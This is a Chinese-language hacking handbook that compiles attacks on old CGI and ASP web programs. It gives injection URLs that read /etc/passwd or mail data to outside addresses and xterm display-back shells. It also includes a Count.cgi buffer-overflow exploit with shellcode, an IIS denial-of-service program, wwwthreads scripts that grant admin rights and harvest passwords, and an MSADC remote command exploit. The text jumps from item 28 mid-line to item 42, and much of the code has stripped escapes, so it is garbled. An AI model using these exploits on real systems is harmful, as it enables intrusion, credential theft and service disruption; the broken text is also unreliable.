文章作者：无用君[ISFOCUS]

前一段拜读了小许的《CGI漏洞攻击手册version-0.02》，觉得这种文章的确很重要，但现在的网络程序攻击已不仅仅局限于CGI和pl程序了，所以这回从网上找来了一些常见的asp程序漏洞并加了进来，改名为《网络程序攻击手册》并且修正了原来《CGI漏洞攻击手册version-0.02》那段攻击Count.cgi程序的不完整性，希望对大家有所帮助！

一. phf漏洞
 这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:

 lynx http://www.victim.com/cgi-bin/ph ... n/cat%20/etc/passwd

 但是我们还能找到它吗?

二. php.cgi 2.0beta10或更早版本的漏洞
 可以读nobody权限的所有文件.

 lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

 php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd、/etc/security/passwd等.

三. whois_raw.cgi

 lynx http://www.victim.com/cgi-bin/wh ... 0Acat%20/etc/passwd
 lynx http://www.victim.com/cgi-bin/wh ... =%0A/usr/X11R6/bin/
xterm%20-display%20graziella.lame.org:0

四. faxsurvey

 lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

五. textcounter.pl
 如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.

 #!/usr/bin/perl
 $URL='http://dtp.kappa.ro/a/test.shtml';# please _DO_ _modify_ this
 $EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this
 if ($ARGV[0]) { $CMD=$ARGV[0];}else{
 $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail $ -sanothere_one";
 }$text="$/;IFS=8;$;echo|";$text =~ s/ /$/g;#print "$textn";
 system( "wget", $text, "-O/dev/null");
 system( "wget", $text, "-O/dev/null");
 #system( "lynx", $text); #如果没有wget命令也可以用lynx
 #system( "lynx", $text);

六. 一些版本(1.1)的info2www的漏洞
 $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami $
 You have new mail.
 $

 说实在我不太明白.:(

七. pfdispaly.cgi

 lynx -source
 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

 pfdisplay.cgi还有另外一个漏洞可以执行命令

 lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
 or
 lynx -dump
 http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

八. wrap

 lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

九. www-sql
 可以让你读一些受限制的页面如:
 在你的浏览器里输入:http://your.server/protected/something.html:
 被要求输入帐号和口令.而有www-sql就不必了:

 http://your.server/cgi-bin/www-sql/protected/something.html:

十. view-source

 lynx http://www.victim.com/cgi-bin/vi ... ../../../etc/passwd

十一.campas

 lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

十二.webgais

 telnet www.victim.com 80
 POST /cgi-bin/webgais HTTP/1.0
 Content-length: 85 (replace this with the actual length of the "exploit"line)
 query=';mail+drazvan@pop3.kappa.ro
十三.websendmail

 telnet www.victim.com 80
 POST /cgi-bin/websendmail HTTP/1.0
 Content-length: xxx (should be replaced with the actual length of the
 string passed to the server, in this case xxx=90)
 receiver=;mail+your_address@somewhere.org
十四.handler

 telnet www.victim.com 80
 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
 or
 GET /cgi-bin/handler/blah;xwsh-displayyourhost.com|?data=Download
 or
 GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download

 注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.

十五.test-cgi

 lynx http://www.victim.com/cgi-bin/test-cgi?whatever
 CGI/1.0 test script report:

 argc is 0. argv is .

 SERVER_SOFTWARE = NCSA/1.4B
 SERVER_NAME = victim.com
 GATEWAY_INTERFACE = CGI/1.1
 SERVER_PROTOCOL = HTTP/1.0
 SERVER_PORT = 80
 REQUEST_METHOD = GET
 HTTP_ACCEPT = text/plain, application/x-html, application/html,
 text/html, text/x-html
 PATH_INFO =
 PATH_TRANSLATED =
 SCRIPT_NAME = /cgi-bin/test-cgi
 QUERY_STRING = whatever
 REMOTE_HOST = fifth.column.gov
 REMOTE_ADDR = 200.200.200.200
 REMOTE_USER =
 AUTH_TYPE =
 CONTENT_TYPE =
 CONTENT_LENGTH =
 得到一些http的目录

 lynx http://www.victim.com/cgi-bin/te ... n/cat%20/etc/passwd
 这招好象并不管用.:(
 lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
 还可以这样试
 GET /cgi-bin/test-cgi?* HTTP/1.0
 GET /cgi-bin/test-cgi?x *
 GET /cgi-bin/nph-test-cgi?* HTTP/1.0
 GET /cgi-bin/nph-test-cgi?x *
 GET /cgi-bin/test-cgi?x HTTP/1.0 *
 GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *


十六.对于某些BSD的apache可以:

 lynx http://www.victim.com/root/etc/passwd
 lynx http://www.victim.com/~root/etc/passwd

十七.htmlscript

 lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

十八.jj.c

 The demo cgi program jj.c calls /bin/mail without filtering user
 input, so any program based on jj.c could potentially be exploited by
 simply adding a followed by a Unix command. It may require a
 password, but two known passwords include HTTPdrocks and SDGROCKS. If
 you can retrieve a copy of the compiled program running strings on it
 will probably reveil the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions.

十九.Frontpage extensions
 如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本
 和它在服务器上的路径. 还有一些密码文件如:

 http://www.victim.com/_vti_pvt/service.pwd
 http://www.victim.com/_vti_pvt/users.pwd
 http://www.victim.com/_vti_pvt/authors.pwd
 http://www.victim.com/_vti_pvt/administrators.pwd

二十.Freestats.com CGI
 没有碰到过,觉的有些地方不能搞错,所以直接贴英文.

 John Carltonfound following. He developedan exploitfor the
 free web stats services offered at freestats.com, and supplied the
 webmaster with proper code to patch the bug.

 Start anaccount withfreestats.com, andlog in. Click on the
 area thatsays "CLICKHERE TOEDIT YOURUSER PROFILE & COUNTER
 INFO" This willcall up afile called edit.plwith your user#
 and password included in it.Save this file to your hard disk and
 open itwith notepad. The onlyform ofsecurity inthis is a
 hiddenattributeontheformelementof your account number.
 Change this from

 *input type=hidden name=account value=your#*

 to

 *input type=text name=account value=""*

 Save your page and load it into your browser.Their will now be a
 text input box where the hidden element was before.Simply type a
 # in and push the "click here to update user profile" and allthe
 information that appearson your screenhas now beenwritten to
 that user profile.

 But that isn't the worst of it.By using frames (2 frames, one to
 hold this pageyou just made,and one asa target forthe form
 submission) you could change the password on all of their accounts
 with a simple javascript function.

 Deep inside the web site authors still have the good old "edit.pl"
 script. It takes some time to reach it (unlike the path described)
 but you can reach it directly at:

 http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

二十一.Vulnerability in Glimpse HTTP

 telnet target.machine.com 80
 GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor@dhp.com HTTP/1.0

二十二.Count.cgi
 该程序只对Count.cgi 24以下版本有效：

 /*### count.c ########################################################*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>

/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);

/* Constants */
char shell[]=
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"xebx3cx5ex31xc0x89xf1x8dx5ex18x88x46x2cx88x46x30"
"x88x46x39x88x46x4bx8dx56x20x89x16x8dx56x2dx89x56"
"x04x8dx56x31x89x56x08x8dx56x3ax89x56x0cx8dx56x10"
"x89x46x10xb0x0bxcdx80x31xdbx89xd8x40xcdx80xe8xbf"
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff"
"xffxffxffxffxffxffxffxffxffxffxff"
"/usr/X11R6/bin/xterm0-ut0-display0";
char endpad[]=
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff"
"xffxffxffxffxffxffxffxffxffxffxff";



int main (int argc, char *argv[]){
char *shellcode = NULL;
int cnt,ver,retcount, dispnum,dotquads[4],offset;
unsigned long sp;
char dispname[255];
char *host;


offset = sp = cnt = ver = 0;
fprintf(stderr,"t%s - Gusn",argv[0]);
if (argc<3) usage(argv[0]);

while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) {
switch(cnt){
case &#39;h&#39;:
host = optarg;
break;
case &#39;d&#39;:
{
retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&dotquads[1],
&dotquads[2],
&dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));
sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
}
break;
case &#39;v&#39;:
ver = atoi(optarg);
break;
case &#39;o&#39;:
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

sp = offset + getsp(ver);


(void)doit(host,sp,shellcode);

exit(0);
}

unsigned long getsp(int ver) {

/* Get the stack pointer we should be using. YMMV. If it does not work,
try using -o X, where x is between -1500 and 1500 */
unsigned long sp=0;

if (ver == 15) sp = 0xbfffea50;
if (ver == 20) sp = 0xbfffea50;
if (ver == 22) sp = 0xbfffeab4;
if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr,"I don&#39;t have an sp for that version try using the -o option.n");
fprintf(stderr,"Versions above 24 are patched for this bug.n");
exit(1);
} else {
return sp;
}

}


int usage (char *name) {
fprintf(stderr,"tUsage:%s -h host -d <display> -v <version> [-o <offset>]n",name);
fprintf(stderr,"te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22n",name);
exit(1);
}

int openhost (char *host, int port) {

int sock;
struct hostent *he;
struct sockaddr_in sa;

he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostnamen");
exit(-1);
}

memcpy(&sa.sin_addr, he->h_addr, he->h_length);

sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock < 0) {
perror ("cannot open socket");
exit(-1);
}
bzero(&sa.sin_zero,sizeof (sa.sin_zero));

if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
perror("cannot connect to host");
exit(-1);
}

return(sock);
}


void doit (char *host,long sp, char *shellcode) {

int cnt,sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a";

bzero(buf);


for(cnt=0;cnt<4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy(qs,chain);
qs[strlen(chain)]=0x90;

qs[4104]= sp&0x000000ff;
qs[4105]=(sp&0x0000ff00)>>8;
qs[4106]=(sp&0x00ff0000)>>16;
qs[4107]=(sp&0xff000000)>>24;
qs[4108]= sp&0x000000ff;
qs[4109]=(sp&0x0000ff00)>>8;
qs[4110]=(sp&0x00ff0000)>>16;
qs[4111]=(sp&0xff000000)>>24;
qs[4112]= sp&0x000000ff;
qs[4113]=(sp&0x0000ff00)>>8;
qs[4114]=(sp&0x00ff0000)>>16;
qs[4115]=(sp&0xff000000)>>24;
qs[4116]= sp&0x000000ff;
qs[4117]=(sp&0x0000ff00)>>8;
qs[4118]=(sp&0x00ff0000)>>16;
qs[4119]=(sp&0xff000000)>>24;
qs[4120]= sp&0x000000ff;
qs[4121]=(sp&0x0000ff00)>>8;
qs[4122]=(sp&0x00ff0000)>>16;
qs[4123]=(sp&0xff000000)>>24;
qs[4124]= sp&0x000000ff;
qs[4125]=(sp&0x0000ff00)>>8;
qs[4126]=(sp&0x00ff0000)>>16;
qs[4127]=(sp&0xff000000)>>24;
qs[4128]= sp&0x000000ff;
qs[4129]=(sp&0x0000ff00)>>8;
qs[4130]=(sp&0x00ff0000)>>16;
qs[4131]=(sp&0xff000000)>>24;
strcpy((char*)&qs[4132],shellcode);
sock = openhost(host,80);
write(sock,"GET /cgi-bin/Count.cgi?",23);
write(sock,qs,strlen(qs));
write(sock," HTTP/1.0n",10);
write(sock,"User-Agent: ",12);
write(sock,qs,strlen(qs));
write(sock,"nn",2);
sleep(1);

/* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0nUser-Agent: %snn",qs,qs); */

/*
setenv("HTTP_USER_AGENT",qs,1);
setenv("QUERY_STRING",qs,1);
system("./Count.cgi");
*/
}


用法是：count -h <攻击目标IP> -d <显示> -v <Count.cgi的版本>
例如：count -h www.foo.bar -d 127.0.0.1:0 -v 22


用Count.cgi看图片

http://attacked.host.com/cgi-bin ... ath_to_gif/file.gif

二十三.finger.cgi

 lynx http://www.victim.com/cgi-bin/finger?@localhost

 得到主机上登陆的用户名.

二十四.man.sh

Robert Moniotfound followung. The May1998 issueof SysAdmin
 Magazinecontainsanarticle,"Web-EnabledManPages", which
 includes source code for very nice cgi script named man.sh to feed
 man pagesto aweb browser. The hypertextlinks toother man
 pages are an especially attractive feature.

 Unfortunately, this script is vulnerable to attack. Essentially,
 anyone who can execute the cgi thru their web browser can runany
 system commands with the user id of the web server and obtainthe
 output from them in a web page.

二十五.FormHandler.cgi
 在表格里加上

 你的邮箱里就有/etc/passwd

二十六.JFS
 相信大家都看过"JFS 侵入 PCWEEK-LINUX 主机的详细过程"这篇文章,他利用photoads
 这个CGI模块攻入主机. 我没有实际攻击过,看文章的理解是这样

 先lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?
AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%
0a11111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&pa
ssword=0&CityStPhone=0&Renewed=0"

 创建新AD值绕过 $AdNum 的检查后用

 lynx &#39;http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?
file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111&DataFile=1&Password=0&FILE
_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/
../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif&#39;

 创建/覆盖用户 nobody 有权写的任何文件.
 不知我的理解是否对,在它的zip包里我找不到to_url脚本,不知哪位同志知道?

二十七.backdoor
 看到现在一些cgichk.c里都有检查木马unlg1.1和rwwwshell.pl
 前一个是UnlG写的,我没见过源码,有一个是THC写的,packetstorm里有它1.6版的源码.



二十八.shtml.dll
在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息：
http://www.victim.com/_vti_bin/shtml.dll/something.html
这样将返回以下信息：
Cannot open "d:inetpubwwwrootpostinfo1.html": no such file or folder.
但是如果我们请求并非HTML、SHTML或者ASP后缀的文件，我们将会得到不同的信息：
http://207.69.190.42/_vti_bin/shtml.dll/something.exe

shtml.dll对较长的带html后缀的文件名都会进行识别和处理，利用这一点，可以对IIS服务器执行DOS攻击，以下这个程序，能使目标服务器的CPU占用率达到 100%，并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满：

#include<stdio.h>
#include<string.h>
#include<winsock.h>
#include<windows.h>
#include<process.h>

void Dos(void *chara);

void main(int argc,char *argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
long lDo ;
if (argc < 2)
{
printf("Usage: %s IPn",argv[0]);
exit(1);
return ;
}

wVersionRequested = MAKEWORD( 2, 2 );

err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
 return;
}



 if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 )
 {
 WSACleanup( );
 return;
 }


printf("wait ...n");
for (lDo = 0 ;lDo < 1000;lDo++)
{
//printf("1n");
 _beginthread(Dos, 0, (void*)argv[1]);
}
Sleep( 1000000L );
}

void Dos(void *chara)
{
long lLen;
long lDo ;
char *ip ;
char buffer[2000];
struct sockaddr_in serv_addr;
SOCKET sockfd ;
char plusvuln[]="GET /_vti_bin/shtml.dll/";
ip= (char*)chara;
memset(buffer,&#39;

四十二.wwwthreads
wwwthreads是应用很广的论坛服务程序，在一些国外的安全论坛上应用较多。这套论坛程序有个漏洞，其SQL information retrieval engine允许远程用户获取用户名和密码，允许入侵者使用insert的SQL命令，获取数据库的访问权。在一个全世界最著名的黑客站点之一的论坛上测试通过。


Exploit:
-[ wwwthreads.pl

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a &#39;&#39; before the &#39;$&#39; characters
$passhash="$1$V2$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d&#39;Administrator&#39;,U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0rn".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.plrnrn";

print sendraw($tosend);

sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#39;tcp&#39;)||0) ||
die("Socket problemsn");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr;my @in=<S>;
select(STDOUT);close(S);
return @in;
} else { die("Can&#39;t connect...n"); ]


-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you&#39;re administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a &#39;&#39; before the &#39;$&#39; characters
$passhash="$1$V2$zxcvzxvczxcvzxvczxcv";

#####################################################

@letts=split(//,&#39;0ABCDEFGHIJKLMNOPQRSTUVWXYZ&#39;);
print STDERR "wwwthreads password snatcher by rain forest puppyrn";
print STDERR "Getting initial user lists...";

foreach $let (@letts){
$parms="Cat=&Start=$let";
$tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0rn".
"Referer: http://$ip/cgi-bin/wwwthreads/rn".
"Cookie: Username=$username; Password=$passhashrnrn";

my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/showoneuser.pl?User=([^"]+)">/){
push @users, $1;]}

$usercount=@users;
print STDERR "$usercount users retrieved.rn".
"Fetching individual passwords...rn";

foreach $user (@users){
$parms="User=$user";
$tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0rn".
"Referer: http://$ip/cgi-bin/wwwthreads/rn".
"Cookie: Username=$username; Password=$passhashrnrn";

my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/OldPass value = "([^"]+)"/){
($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
print $user.&#39;:&#39;.$pass."::::::::::n";
last;]}

print STDERR "done.rnrn";

sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#39;tcp&#39;)||0) ||
die("Socket problemsn");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr;my @in=<S>;
select(STDOUT);close(S);
return @in;
} else { die("Can&#39;t connect...n"); ]

四十三.msadcs.dll
IIS 4.0的缺省安装设置的是MDAC1.5，这个安装下有一个/msadc/msadcs.dll的文件，也允许通过web远程访问ODBC，获取系统的控制权.、如果web目录下的/msadc/msadcs.dll/可以访问，那么ms的任何补丁可能都没用，用类似:
/%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset
的请求，就可以绕过安全机制进行非法的VbBusObj请求，从而达到入侵的目的。
攻击程序:

#将下面这段保存为txt文件，然后: "perl -x 文件名"

#!perl
#
# MSADC/RDS &#39;usage&#39; (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!

use Socket; use Getopt::Std;
getopts("e:vd:h:XR", %args);

print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --n";

if (!defined $args && !defined $args) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host>= host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-v = verbose
-e = external dictionary file for step 5

Or a -R will resume a command session

~; exit;}

$ip=$args; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args) { $verbose=1; } else
if (defined $args) { $delay=$args;} else
if(!defined $args){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn&#39;t exist?");}
if (defined $args && !defined $args) { &hork_idx; exit; }

if (!defined $args){ $ret = &has_msadc;
die("Looks like msadcs.dll doesn&#39;t existn")if $ret==0}

print "Please type the NT commandline you want to run (cmd /c assumed):n"
. "cmd /c ";
$in=<STDIN>; chomp $in;
$command="cmd /c " . $in ;

if (defined $args) {&load; exit;}

print "nStep 1: Trying raw driver to btcustmr.mdbn";
&try_btcustmr;

print "nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<<success>>n" : print "<<fail>>n";

print "nStep 3: Trying known DSNs...";
&known_dsn;

print "nStep 4: Trying known .mdbs...";
&known_mdb;

if (defined $args){
print "nStep 5: Trying dictionary of DSN names...";
&dsn_dict; } else { "nNo -e; Step 5 skipped.nn"; }

print "Sorry Charley...maybe next time?n";
exit;

##############################################################################

sub sendraw {# ripped and modded from whisker
sleep($delay); # it&#39;s a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#39;tcp&#39;)||0) ||
die("Socket problemsn");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("Can&#39;t connect...n"); ]

##############################################################################

sub make_header { # make the HTTP request
my $msadc=<<EOT
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen

EOT
; $msadc=~s/n/rn/g;
return $msadc;}

##############################################################################

sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;

if ($switch==1){ # this is the btcustmr.mdb query
$query="select * from Customers where City=" . make_shell();
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\" . $p2 . "\help\iis\htm\tutorial\btcustmr.mdb;";}

elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}

elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C=" . make_shell();
$dsn="$p1";}

elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}

elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}

$t1= make_unicode($query);
$t2= make_unicode($dsn);
$req = "x02x00x03x00";
$req.= "x08x00" . pack ("S1", length($t1));
$req.= "x00x00" . $t1 ;
$req.= "x08x00" . pack ("S1", length($t2));
$req.= "x00x00" . $t2 ;
$req.="rn--!ADM!ROX!YOUR!WORLD!--rn";
return $req;}

##############################################################################

sub make_shell { # this makes the shell() statement
return "&#39;|shell("$command")|&#39;";}

##############################################################################

sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "x00"; }
return $out;}

##############################################################################

sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart/mixed/){
return 1 if( $in[$base+10]=~/^x09x00/ );}
return 0;}

##############################################################################

sub make_dsn { # this makes a DSN for us
my @drives=("c","d","e","f");
print "nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft%2B" .
"Access%2BDriver%2B%28*.mdb%29&dsn=wicca&dbq="
. $drive . "%3A%5Csys.mdb&newdb=create_DB&attr= HTTP/1.0nn");
$results[0]=~m#HTTP/([0-9.]+) ([0-9]+) ([^n]*)#;
return 0 if $2 eq "404"; # not found/doesn&#39;t exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful</H2>/;]
} return 0;}

##############################################################################

sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0nn");
return $results[0];}

##############################################################################

sub try_btcustmr {
my @drives=("c","d","e","f");
my @dirs=("winnt","winnt35","winnt351","win","windows");

foreach $dir (@dirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;

my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!n";save(1,1,$drive,$dir);exit;}
else { verbose(odbc_error(@results)); funky(@results);] print "n";]

##############################################################################

sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 []:/\&#39;()]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 []:/\&#39;()]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 []:/\&#39;()]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "nNON-STANDARD error. Please sent this info to rfp@wiretrip.net:n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

##############################################################################

sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "n$inn";}

##############################################################################

sub save {
